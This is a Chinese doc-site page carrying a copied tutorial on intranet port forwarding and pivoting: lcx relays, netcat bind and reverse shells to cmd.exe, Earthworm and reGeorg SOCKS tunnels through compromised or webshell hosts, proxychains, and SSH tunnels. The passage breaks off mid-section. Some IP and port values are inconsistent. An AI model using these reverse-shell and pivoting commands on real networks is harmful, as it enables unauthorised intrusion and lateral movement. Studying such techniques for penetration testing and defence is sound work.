技术文档收录
ASCII
Tcpdump
IPV4保留地址段
深入理解以太网网线原理 - 三帛的世界
Linux
WireGuard 一键安装脚本 | 秋水逸冰
SSH Config 那些你所知道和不知道的事 | Deepzz's Blog
Linux 让终端走代理的几种方法
ubuntu 20.04 server 版设置静态 IP 地址 - 链滴
Linux 挂载 Windows 共享磁盘的方法 - 技术学堂
将 SMB/CIFS 网络硬盘永久的挂载到 Ubuntu 上 - 简书
linux 获取当前脚本的绝对路径 | aimuke
[Linux] Linux 使用 / dev/urandom 生成随机数 - piaohua's blog
Linux 生成随机数的多种方法 | Just Do It
Linux 的 Centos7 版本下忘记 root 或者普通用户密码怎么办?
Git 强制拉取覆盖本地
SSH 安全加固指南 - FreeBuf 网络安全行业门户
Linux 系统安全强化指南 - FreeBuf 网络安全行业门户
Linux 入侵排查 - FreeBuf 网络安全行业门户
sshd_config 配置详解 - 简书
SSH 权限详解 - SegmentFault 思否
CentOS 安装 node.js 环境 - SegmentFault 思否
如何在 CentOS 7 上安装 Node.js 和 npm | myfreax
几款 ping tcping 工具总结
OpenVpn 搭建教程 | Jesse's home
openvpn 一键安装脚本 - 那片云
OpenVPN 解决 每小时断线一次 - 爱开源
OpenVPN 路由设置 – 凤曦的小窝
OpenVPN 设置非全局代理 - 镜子的记录簿
TinyProxy 使用帮助 - 简书
Ubuntu 下使用 TinyProxy 搭建代理 HTTP 服务器_Linux_运维开发网_运维开发技术经验分享
Linux 软件包管理工具 Snap 常用命令 - 简书
linux systemd 参数详解
Systemd 入门教程:命令篇 - 阮一峰的网络日志
记一次 Linux 木马清除过程
rtty:在任何地方通过 Web 访问您的终端
02 . Ansible 高级用法 (运维开发篇)
终于搞懂了服务器为啥产生大量的 TIME_WAIT!
巧妙的 Linux 命令,再来 6 个!
77% 的 Linux 运维都不懂的内核问题,这篇全告诉你了
运维工程师必备:请收好 Linux 网络命令集锦
一份阿里员工的 Java 问题排查工具单
肝了 15000 字性能调优系列专题(JVM、MySQL、Nginx and Tomcat),看不完先收
作业调度算法(FCFS,SJF,优先级调度,时间片轮转,多级反馈队列) | The Blog Of WaiterXiaoYY
看了这篇还不会 Linux 性能分析和优化,你来打我
2019 运维技能风向标
更安全的 rm 命令,保护重要数据
求你了,别再纠结线程池大小了!
Linux sudo 详解 | 失落的乐章
重启大法好!线上常见问题排查手册
sudo 使用 - 笨鸟教程的博客 | BY BenderFly
shell 在手分析服务器日志不愁? - SegmentFault 思否
sudo 与 visudo 的超细用法说明_陈发哥 007 的技术博客_51CTO 博客
ESXI 下无损扩展 Linux 硬盘空间 | Naonao Blog
Linux 学习记录:su 和 sudo | Juntao Tan 的个人博客
使用者身份切换 | Linux 系统教程(笔记)
你会使用 Linux 编辑器 vim 吗?
在 Windows、Linux 和 Mac 上查看 Wi-Fi 密码
linux 隐藏你的 crontab 后门 - 简书
Linux 定时任务详解 - Tr0y's Blog
linux 的 TCP 连接数量最大不能超过 65535 个吗,那服务器是如何应对百万千万的并发的?_一口 Linux 的博客 - CSDN 博客_tcp 连接数多少正常
万字长文 + 28 张图,一次性说清楚 TCP,运维必藏
为什么 p2p 模式的 tunnel 底层通常用 udp 而不是 tcp?
记一次服务器被入侵挖矿 - tlanyan
shell 判断一个变量是否为空方法总结 - 腾讯云开发者社区 - 腾讯云
系统安装包管理工具 | Escape
编译代码时动态地链接库 - 51CTO.COM
甲骨文 Oracle Cloud 添加新端口开放的方法 - WirelessLink 社区
腾讯云 Ubuntu 添加 swap 分区的方法_弓弧名家_玄真君的博客 - CSDN 博客
Oracle 开放全部端口并关闭防火墙 - 清~ 幽殇
谁再说不熟悉 Linux 命令, 就把这个给他扔过去!
即插即用,运维工程师必会正则表达式大全
Shell脚本编写及常见面试题
Samba 文件共享服务器
到底一台服务器上最多能创建多少个 TCP 连接 | plantegg
SSH 密钥登录 - SSH 教程 - 网道
在 Bash 中进行 encodeURIComponent/decodeURIComponent | Harttle Land
使用 Shell 脚本来处理 JSON - Tom CzHen's Blog
Docker
「Docker」 - 保存镜像 - 知乎
终于可以像使用 Docker 一样丝滑地使用 Containerd 了!
私有镜像仓库选型:Harbor VS Quay - 乐金明的博客 | Robin Blog
exec 与 entrypoint 使用脚本 | Mr.Cheng
Dockerfile 中的 CMD 与 ENTRYPOINT
使用 Docker 配置 MySQL 主从数据库 - 墨天轮
Alpine vs Distroless vs Busybox – 云原生实验室 - Kubernetes|Docker|Istio|Envoy|Hugo|Golang | 云原生
再见,Docker!
docker save 与 docker export 的区别 - jingsam
如何优雅的关闭容器
docker 储存之 tmpfs 、bind-mounts、volume | 陌小路的个人博客
Dockerfile 中 VOLUME 与 docker -v 的区别是什么 - 开发技术 - 亿速云
理解 docker 容器的退出码 | Vermouth | 博客 | docker | k8s | python | go | 开发
【Docker 那些事儿】容器监控系统,来自 Docker 的暴击_飞向星的客机的博客 - CSDN 博客
【云原生】Docker 镜像详细讲解_微枫 Micromaple 的博客 - CSDN 博客_registry-mirrors
【云原生】Helm 架构和基础语法详解
CMD 和 Entrypoint 命令使用变量的用法
实时查看容器日志 - 苏洋博客
Traefik 2 使用指南,愉悦的开发体验 - 苏洋博客
为你的 Python 应用选择一个最好的 Docker 映像 | 亚马逊 AWS 官方博客
【云原生】镜像构建实战操作(Dockerfile)
Docker Compose 中的 links 和 depends_on 的区别 - 编程知识 - 白鹭情
Python
Pipenv:新一代Python项目环境与依赖管理工具 - 知乎
Python list 列表实现栈和队列
Python 各种排序 | Lesley's blog
Python 中使用 dateutil 模块解析时间 - SegmentFault 思否
一个小破网站,居然比 Python 官网还牛逼
Python 打包 exe 的王炸 - Nuitka
Django - - 基础 - - Django ORM 常用查询语法及进阶
[Python] 小知識:== 和 is 的差異 - Clay-Technology World
Window
批处理中分割字符串 | 网络进行时
Windows 批处理基础命令学习 - 简书
在Windows上设置WireGuard
Windows LTSC、LTSB、Server 安装 Windows Store 应用商店
windows 重启 rdpclip.exe 的脚本
中间件
Nginx 中的 Rewrite 的重定向配置与实践
RabbitMQ 的监控
RabbitMq 最全的性能调优笔记 - SegmentFault 思否
为什么不建议生产用 Redis 主从模式?
高性能消息中间件——NATS
详解:Nginx 反代实现 Kibana 登录认证功能
分布式系统关注点:仅需这一篇,吃透 “负载均衡” 妥妥的
仅需这一篇,妥妥的吃透” 负载均衡”
基于 nginx 实现上游服务器动态自动上下线——不需 reload
Nginx 学习书单整理
最常见的日志收集架构(ELK Stack)
分布式之 elk 日志架构的演进
CAT 3.0 开源发布,支持多语言客户端及多项性能提升
Kafka 如何做到 1 秒处理 1500 万条消息?
Grafana 与 Kibana
ELK 日志系统之通用应用程序日志接入方案
ELK 简易 Nginx 日志系统搭建: ElasticSearch+Kibana+Filebeat
记一次 Redis 连接池问题引发的 RST
把 Redis 当作队列来用,你好大的胆子……
Redis 最佳实践:业务层面和运维层面优化
Redis 为什么变慢了?常见延迟问题定位与分析
好饭不怕晚,扒一下 Redis 配置文件的底 Ku
rabbitmq 集群搭建以及万级并发下的性能调优
别再问我 Redis 内存满了该怎么办了
Nginx 状态监控及日志分析
uWSGI 的安装及配置详解
uwsgi 异常服务器内存 cpu 爆满优化思路
Uwsgi 内存占用过多 - 简书
Nginx 的 limit 模块
Nginx 内置模块简介
Redis 忽然变慢了如何排查并解决?_redis_码哥字节_InfoQ 写作社区
领导:谁再用 redis 过期监听实现关闭订单,立马滚蛋!
Nginx 限制 IP 访问频率以及白名单配置_问轩博客
Nginx $remote_addr 和 $proxy_add_x_forwarded_for 变量详解
Caddy 部署实践
一文搞定 Nginx 限流
数据库
SqlServer 将数据库中的表复制到另一个数据库_MsSql_脚本之家
SQL Server 数据库同步,订阅、发布、复制、跨服务器
sql server 无法删除本地发布 | 辉克's Blog
SQLite全文检索
SQL 重复记录查询的几种方法 - 简书
SQL SERVER 使用订阅发布同步数据库(转)
Mysql 查看用户连接数配置及每个 IP 的请求情况 - 墨天轮
优化 SQL 的 21 条方案
SQL Server 连接时好时坏的奇怪问题
MS SQL 执行大脚本文件时,提示 “内存不足” 的解决办法 - 阿里云开发者社区
防火墙-iptables
iptables 常用规则:屏蔽 IP 地址、禁用 ping、协议设置、NAT 与转发、负载平衡、自定义链
防火墙 iptables 企业防火墙之 iptables
Linux 防火墙 ufw 简介
在 Ubuntu 中用 UFW 配置防火墙
在 Ubuntu20.04 上怎样使用 UFW 配置防火墙 - 技术库存网
监控类
开箱即用的 Prometheus 告警规则集
prometheus☞搭建 | zyh
docker 部署 Prometheus 监控服务器及容器并发送告警 | chris'wang
PromQL 常用命令 | LRF 成长记
prometheus 中使用 python 手写 webhook 完成告警
持续集成CI/CD
GitHub Actions 的应用场景 | 记录干杯
GithubActions · Mr.li's Blog
工具类
GitHub 中的开源网络广告杀手,十分钟快速提升网络性能
SSH-Auditor:一款 SHH 弱密码探测工具
别再找了,Github 热门开源富文本编辑器,最实用的都在这里了 - srcmini
我最喜欢的 CLI 工具
推荐几款 Redis 可视化工具
内网代理工具与检测方法研究
环境篇:数据同步工具 DataX
全能系统监控工具 dstat
常用 Web 安全扫描工具合集
给你一款利器!轻松生成 Nginx 配置文件
教程类
Centos7 搭建神器 openvpn | 运维随笔
搭建 umami 收集个人网站统计数据 | Reorx’s Forge
openvpn安装教程
基于 gitea+drone 完成小团队的 CI/CD - 德国粗茶淡饭
将颜色应用于交替行或列
VMware Workstation 全系列合集 精简安装注册版 支持 SLIC2.6、MSDM、OSX 更新 16.2.3_虚拟机讨论区_安全区 卡饭论坛 - 互助分享 - 大气谦和!
在 OpenVPN 上启用 AD+Google Authenticator 认证 | 运维烂笔头
Github 进行 fork 后如何与原仓库同步:重新 fork 很省事,但不如反复练习版本合并 · Issue #67 · selfteaching/the-craft-of-selfteaching
卧槽,VPN 又断开了!!- 阿里云开发者社区
Grafana Loki 学习之踩坑记
zerotier 的 planet 服务器(根服务器)的搭建踩坑记。无需 zerotier 官网账号。
阿里云 qcow2 镜像转 vmdk,导入 ESXi - 唐际忠的博客
Caddy 入门 – 又见杜梨树
【Caddy2】最新 Caddy2 配置文件解析 - Billyme 的博客
Web 服务器 Caddy 2 | Haven200
手把手教你打造高效的 Kubernetes 命令行终端
Keras 作者:给软件开发者的 33 条黄金法则
超详细的网络抓包神器 Tcpdump 使用指南
使用 fail2ban 和 FirewallD 黑名单保护你的系统
linux 下 mysql 数据库单向同步配置方法分享 (Mysql)
MySQL 快速删除大量数据(千万级别)的几种实践方案
GitHub 上的优质 Linux 开源项目,真滴牛逼!
WireGuard 教程:使用 Netmaker 来管理 WireGuard 的配置 – 云原生实验室 - Kubernetes|Docker|Istio|Envoy|Hugo|Golang | 云原生
Tailscale 基础教程:Headscale 的部署方法和使用教程 – 云原生实验室 - Kubernetes|Docker|Istio|Envoy|Hugo|Golang | 云原生
Nebula Graph 的 Ansible 实践
改进你的 Ansible 剧本的 4 行代码
Caddy 2 快速简单安装配置教程 – 高玩梁的博客
切换至 Caddy2 | 某不科学的博客
Caddy2 简明教程 - bleem
树莓派安装 OpenWrt 突破校园网限制 | Asttear's Blog
OpenVPN 路由设置 – 凤曦的小窝
个性化编译 LEDE 固件
盘点各种 Windows/Office 激活工具
[VirtualBox] 1、NAT 模式下端口映射
VirtualBox 虚拟机安装 openwrt 供本机使用
NUC 折腾笔记 - 安装 ESXi 7 - 苏洋博客
锐捷、赛尔认证 MentoHUST - Ubuntu 中文
How Do I Use A Client Certificate And Private Key From The IOS Keychain? | OpenVPN
比特记事簿: 笔记: 使用电信 TR069 内网架设 WireGuard 隧道异地组网
利用 GitHub API 获取最新 Releases 的版本号 | 这是只兔子
docsify - 生成文档网站简单使用教程 - SegmentFault 思否
【干货】Chrome 插件 (扩展) 开发全攻略 - 好记的博客
一看就会的 GitHub 骚操作,让你看上去像一位开源大佬
【计算机网络】了解内网、外网、宽带、带宽、流量、网速_墩墩分墩 - CSDN 博客
mac-ssh 配置 | Sail
如何科学管理你的密码
VirtualBox NAT 端口映射实现宿主机与虚拟机相互通信 | Shao Guoliang 的博客
CentOS7 配置网卡为静态 IP,如果你还学不会那真的没有办法了!
laisky-blog: 近期折腾 tailscale 的一些心得
使用 acme.sh 给 Nginx 安装 Let’ s Encrypt 提供的免费 SSL 证书 · Ruby China
acme 申请 Let’s Encrypt 泛域名 SSL 证书
从 nginx 迁移到 caddy
使用 Caddy 替代 Nginx,全站升级 https,配置更加简单 - Diamond-Blog
http.proxy - Caddy 中文文档
动手撸个 Caddy(二)| Caddy 命令行参数最全教程 | 飞雪无情的总结
Caddy | 学习笔记 - ijayer
Caddy 代理 SpringBoot Fatjar 应用上传静态资源
使用 graylog3.0 收集 open××× 日志进行审计_年轻人,少吐槽,多搬砖的技术博客_51CTO 博客
提高国内访问 github 速度的 9 种方法! - SegmentFault 思否
VM16 安装 macOS 全网最详细
2022 目前三种有效加速国内 Github
How to install MariaDB on Alpine Linux | LibreByte
局域网内电脑 - ipad 文件共享的三种方法 | 岚
多机共享键鼠软件横向测评 - 尚弟的小笔记
VLOG | ESXI 如何升级到最新版,无论是 6.5 还是 6.7 版本都可以顺滑升级。 – Vedio Talk - VLOG、科技、生活、乐分享
远程修改 ESXi 6.7 管理 IP 地址 - 腾讯云开发者社区 - 腾讯云
几乎不要钱自制远程 PLC 路由器方案
traefik 简易入门 | 个人服务器运维指南 | 山月行
更完善的 Docker + Traefik 使用方案 - 苏洋博客
MicroSD·TF 卡终极探秘 ·MLC 颗粒之谜 1 三星篇_microSD 存储卡_什么值得买
macOS 绕过公证和应用签名方法 - 走客
MiscSecNotes / 内网端口转发及穿透. md at master · JnuSimba/MiscSecNotes
我有特别的 DNS 配置和使用技巧 | Sukka's Blog
SEO:初学者完整指南
通过 OpenVPN 实现流量审计
OpenVPN-HOWTO
OpenVPN Server · Devops Roadmap
Linux 运维必备的 13 款实用工具, 拿好了~
linux 平台下 Tomcat 的安装与优化
Linux 运维跳槽必备的 40 道面试精华题
Bash 脚本进阶,经典用法及其案例 - alonghub - 博客园
推荐几个非常不错的富文本编辑器 - 走看看
在 JS 文件中加载 JS 文件的方法 - 月光博客
#JavaScript 根据需要动态加载脚本并设置自定义参数
笔记本电脑 BIOS 修改及刷写教程
跨平台加密 DNS 和广告过滤 personalDNSfilter · LinuxTOY
AdGuard Home 安装及使用指北
通过 Amazon S3 协议挂载 OSS
记一次云主机如何挂载对象存储
本文档发布于https://mrdoc.fun
-
+
首页
MiscSecNotes / 内网端口转发及穿透. md at master · JnuSimba/MiscSecNotes
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [github.com](https://github.com/JnuSimba/MiscSecNotes/blob/master/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/%E5%86%85%E7%BD%91%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%8F%8A%E7%A9%BF%E9%80%8F.md) 原文 by (由) [CH_vksec](http://ch.vksec.com/2017/06/blog-post_72.html) 最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-1.png) [](#0x01-正向和反向代理)0x01 正向和反向代理 ----------------------------- 正向代理中,proxy 和 client (客户端) 同属一个 LAN,对 server 透明; 反向代理中,proxy 和 server 同属一个 LAN,对 client (客户端) 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后者叫做反向代理。 ### [](#正向代理-forward-proxy)正向代理 ( Forward (向前) Proxy) Lhost--》proxy--》Rhost Lhost 为了访问到 Rhost,向 proxy 发送了一个请求并且指定目标是 Rhost,然后 proxy 向 Rhost 转交请求并将获得的内容返回给 Lhost,简单来说正向代理就是 proxy 代替了我们去访问 Rhost。 ### [](#反向代理reverse-proxy)反向代理( reverse (逆向) proxy) Lhost<--->proxy<--->firewall<--->Rhost 和正向代理相反(废话),Lhost 只向 proxy 发送普通的请求,具体让他转到哪里,proxy 自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许 proxy 数据进出的时候可以有效的进行穿透 ### [](#简单区分)简单区分 正向代理代理的是客户端,反向代理代理的是服务端,正向代理是我们自己 (Lhost) 戴套 (proxy) 插进去,反向代理是她 (Rhost) 主动通过上位 (proxy) 坐上来 (Lhost)。 [](#0x02-lcx-转发)0x02 lcx 转发 --------------------------- 内网 IP:192.168.153.138 公网 ip:192.168.153.140 由于是本地实验,我这里将 138 的防火墙打开,当作内网环境,140 防火墙关闭,充当公网 ip,所以正常情况下不只能 138 访问 140,而 140 不能直接访问 138。这是两台机器互相 ping 的结果。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-2.png) ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-3.png) 1. 内网机器上执行:lcx.exe – slave (奴隶) 公网 IP + 端口 内网 IP + 端口 `lcx.exe –slave 192.168.153.140 4444 192.168.153.138 3389` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-4.png) 将内网 (192.168.153.138) 的 3389 端口转发到公网 (192.168.153.138) 的 4444 端口 2. 公网 (192.168.153.138) 执行:`lcx -listen 4444 5555` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-5.png) 监听公网 4444 端口请求,并将 4444 的请求传送给 5555 端口。 此时已经把内网的 3389 端口转发到了公网的 5555 端口。可以通过 127.0.0.1:5555 连接到内网的远程桌面。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-6.png) ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-7.png) [](#0x03-nc-反弹)0x03 nc 反弹 ------------------------- ### [](#正向连接)正向连接 在内网执行 `nc -l -p 5555 -t -e cmd.exe` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-8.png) -t 是通过 telne 模式执行 cmd.exe 程序,可以省略。 在公网执行 `nc -nvv 192.168.153.138 5555` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-9.png) ### [](#反向连接)反向连接 在公网监听 nc -lp 5555 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-10.png) 在内网机器反弹 nc -t -e cmd 192.168.153.140 5555 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-11.png) [](#0x04-socks-代理工具)0x04 socks (袜子) 代理工具 ---------------------------------------- 常见的 socks (袜子) 代理工具介绍如下 1. Earthworm 工具网址:[http://rootkiter.com/EarthWorm](http://rootkiter.com/EarthWorm) EW 是一套便携式的网络穿透工具,具有 SOCKS (袜子) v5 服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以 "正向"、"反向"、"多级级联" 等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。 目前已经有了最新版 Termite,工具网址:[http://rootkiter.com/Termite/](http://rootkiter.com/Termite/) 2. reGeorg 工具网址:[https://github.com/NoneNotNull/reGeorg](https://github.com/NoneNotNull/reGeorg) reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks (袜子) 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web (网络) 程序中的一种。 3. sSocks 工具网址:[http://sourceforge.net/projects/ssocks/](http://sourceforge.net/projects/ssocks/) sSocks 是一个 socks (袜子) 代理工具套装,可用来开启 socks (袜子) 代理服务,支持 socks5 验证,支持 IPV6 和 UDP,并提供反向 socks 代理服务,即将远程计算机作为 socks 代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为 0.0.13。 4. SocksCap64 工具网址:[http://www.sockscap64.com](http://www.sockscap64.com) (需翻墙) SocksCap64 是一款在 windows 下相当好使的全局代理软件。SocksCap64 可以使 Windows 应用程序通过 SOCKS (袜子) 代理服务器来访问网络而不需要对这些应用程序做任何修改, 即使某些本身不支持 SOCKS (袜子) 代理的应用程序通过 SocksCap64 之后都可以完美的实现代理访问。 5. proxychains 工具网址:[http://proxychains.sourceforge.net/](http://proxychains.sourceforge.net/) Proxychains 是一款在 LINUX 下可以实现全局代理的软件,性能相当稳定可靠。在使任何程序通過代理上网,允許 TCP 和 DNS 通過代理隧道,支持 HTTP、SOCKS4、SOCKS5 類型的代理服务器,支持 proxy chain (链) ,即可配置多个代理,同一個 proxy chain (链) 可使用不同类型的代理服务器 ### [](#0x041-regeorgproxychains-代理)0x04.1 reGeorg+Proxychains 代理 上传 reGeorg 的 tunnel.jsp 到服务器。访问链接,并转发到本地端口。 `python reGeorgSocksProxy.py -p 1080 -u http://192.168.153.137/tunnel.jsp` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-12.png) 使用设置 proxychains 的代理端口,进行访问,一般配合 nmap 和 metasploit 进行后续内网渗透。ps:proxychains 不支持 udp 和 icmp 协议,所以使用 nmap 要加上 - sT -Pn 即使用 tcp 协议且不使用 icmp 协议。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-13.png) ### [](#0x042-ew-穿透)0x04.2 ew 穿透 该工具借用了 ssocks 和 lcx.exe 的操作逻辑,并进行更多的功能强化。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-14.png) 说明 目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为: `ssocksd rcsocks rssocks lcx_slave lcx_tran lcx_listen` 其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向 SOCKS (袜子) 代理。 其余的 lcx 链路状态用于打通测试主机同 socks (袜子) 服务器之间的通路。 lcx 类别管道: lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。 lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。 lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。 通过组合 lcx 类别管道的特性,可以实现多层内网环境下的渗透测试。 下面是一个三级跳的本地测试例子。 ``` ./ew -s rcsocks -l 1080 -e 8888 ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 ./ew -s lcx_listen -l 9999 -e 7777 ./ew -s rssocks -d 127.0.0.1 -e 7777 ``` 数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks #### [](#0x0421-正向-socks5-服务器)0x04.2.1 正向 SOCKS5 服务器 当目标网络边界存在公网 IP 且可任意开监听端口 `ew_for_Win.exe -s ssocksd -l 8888` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-15.png) 上述命令是在该机器(192.168.153.140)开启一个 8888 的正向连接端口。然后其它主机可通过设置代理为 192.168.153.140:8888 添加这个代理。这里使用的是 proxychains ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-16.png) #### [](#0x0422-反弹-socks5-服务器)0x04.2.2 反弹 SOCKS5 服务器 当目标网络边界不存在公网 IP,通过反弹方式创建 socks (袜子) 代理。 先在一台具有公网 ip 的主机 A 上运行以下命令 `./ew_for_linux64 -s rcsocks -l 1080 -e 8888` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-17.png) 意思是在我们公网 VPS 上添加一个转接隧道,把 1080 端口收到的代理请求转交给 8888 端口 在目标主机 B 上启动 SOCKS5 服务 并反弹到公网主机的 8888 端口 `ew_for_Win.exe -s rssocks -d 192.168.153.129 -e 8888` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-18.png) 本地主机(192.168.153.129)然后通过添加公网 192.168.153.129:1080 这个代理, 来访问内网机器(192.168.153.129) 当然如果本地主机如果是公网 ip,就可以把在公网执行的步骤放在本地执行即可。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-19.png) #### [](#0x0423-二级网络环境一)0x04.2.3 二级网络环境(一) 假设我们获得了右侧 A 主机和 B 主机的控制权限,A 主机配有 2 块网卡,一块 10.129.72.168 连通外网,一块 192.168.153.140 只能连接内网 B 主机,无法访问内网其它资源。B 主机可以访问内网资源,但无法访问外网。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-20.png) 先上传 ew 到 B 主机,利用 ssocksd 方式启动 8888 端口的 SOCKS (袜子) 代理,命令如下 `ew_for_Win.exe -s ssocksd -l 8888` 然后在 A 主机执行 `ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.153.138 -g 8888` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-21.png) 含义是将 1080 端口收到的代理请求转交给 B 主机(192.168.153.138)的 8888 端口 然后 My pc 就可以通过 A 的外网代理 10.129.72.168:1080 访问 B。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-22.png) #### [](#0x0424-二级网络环境二)0x04.2.4 二级网络环境(二) 假设我们获得了右侧 A 主机和 B 主机的控制权限,A 主机没有公网 IP,也无法访问内网资源。B 主机可以访问内网资源,但无法访问外网。 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-23.png) 这次操作有四步。 1. 在公网 vps(45.xxx.xxx.72)添加转接隧道,将 10800 端口收到的代理请求转交给 8888 端口 `./ew_for_linux64 -s lcx_listen -l 10800 -e 8888` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-24.png) 2. B(192.168.153.138)主机正向开启 8888 端口 `ew_for_Win.exe -s ssocksd -l 9999` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-25.png) 3. A 主机利用 lcx_slave 方式,将公网 VPS 的 888 端口和 B 主机的 999 端口连接起来 `ew_for_Win.exe -s lcx_slave -d 45.xxx.xxx.72 -e 8888 -f 192.168.153.138 -g 9999` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-26.png) 4. 现在 my pc 可通过访问 45.xxx.xxx.72:10800 来使用 192.168.153.138 主机提供的 socks5 代理,代理成功,vps 会有 rssocks cmd_socket OK! 提示 ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-27.png) ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-28.png) [](#0x05-ssh-隧道代理转发)0x05 ssh 隧道代理转发 ----------------------------------- ssh 有三个强大的端口转发命令,分别是本地转发、远程转发、动态转发。 本地访问 127.0.0.1:port1 就是 host:port2(用的更多) `ssh -CfNg -L port1:127.0.0.1:port2 user@host` #本地转发 访问 host:port2 就是访问 127.0.0.1:port1 `ssh -CfNg -R port2:127.0.0.1:port1 user@host` #远程转发 可以将 dmz_host 的 hostport 端口通过 remote_ip 转发到本地的 port 端口 `ssh -qTfnN -L port:dmz_host:hostport -l user remote_ip` #正向隧道 监听本地 port (港口) 可以将 dmz_host 的 hostport 端口转发到 remote_ip 的 port 端口 `ssh -qTfnN -R port:dmz_host:hostport -l user remote_ip` #反向隧道 用于内网穿透防火墙限制之类 socket 代理: `ssh -qTfnN -D port remotehost` 参数详解: -q Quiet (安静) mode (模式) . 安静模式 -T Disable (禁用) pseudo-tty allocation. 不占用 shell (壳) 了 -f Requests (请求) ssh to go to background (背景) just (只是) before command (命令) execution. 后台运行,并推荐加上 -n 参数 -N Do not execute a remote (远程) command (命令) . 不执行远程命令,端口转发就用它了 `-L port:host:hostport` 将本地机 (客户机) 的某个端口转发到远端指定机器的指定端口. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port (港口) 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 同时远程主机和 host (主机) 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有 root (根) 才能转发特权端口. IPv6 地址用另一种格式说明: `port/host/hostport -R port:host:hostport` 将远程主机 (服务器) 的某个端口转发到本地端指定机器的指定端口. 工作原理是这样的, 远程主机上分配了一个 socket 侦听 port (港口) 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转向出去, 同时本地主机和 host (主机) 的 hostport 端口建立连接. 可以在配置文件中指定端口的转发. 只有用 root (根) 登录远程主机才能转发特权端口. IPv6 地址用另一种格式说明: port (港口) /host/hostport -D port (港口) 指定一个本地机器 "动态的'' 应用程序端口转发. 工作原理是这样的, 本地机器上分配了一个 socket 侦听 port 端口, 一旦这个端口上有了连接, 该连接就经过安全通道转发出去, 根据应用程序的协议可以判断出远程主机将和哪里连接. 目前支持 SOCKS (袜子) 协议, 将充当 SOCKS (袜子) 服务器. 只有 root (根) 才能转发特权端口. 可以在配置文件中指定动态端口的转发. ### [](#0x051-ssh-本地转发)0x05.1 ssh 本地转发 远程管理服务器上的 mysql,mysql 不能直接 root (根) 远程登陆。这时候就可以通过本地转发,通过 ssh 将服务器的 3306 端口转发到本地 1234 端口 `ssh -CfNg -L 1234 127.0.0.1:3306 root@45.32.31.121` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-29.png) ### [](#0x052-ssh-远程转发)0x05.2 ssh 远程转发 内网的服务器,外网不能直接访问,使用远程转发,将内网的服务器端口转发到外网端口。这时候访问外网的端口,就访问到了内网的端口。 `ssh -CfNg -R 81:127.0.0.1:80 root@192.168.153.142` ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-30.png) ![](https://github.com/JnuSimba/MiscSecNotes/raw/master/pictures/port-forwarding-31.png) 现在在 192.168.153.142 访问 127.0.0.1:81 就是访问内网的服务器的 80 端口。 ### [](#0x053-ssh-动态转发-socks-代理)0x05.3 ssh 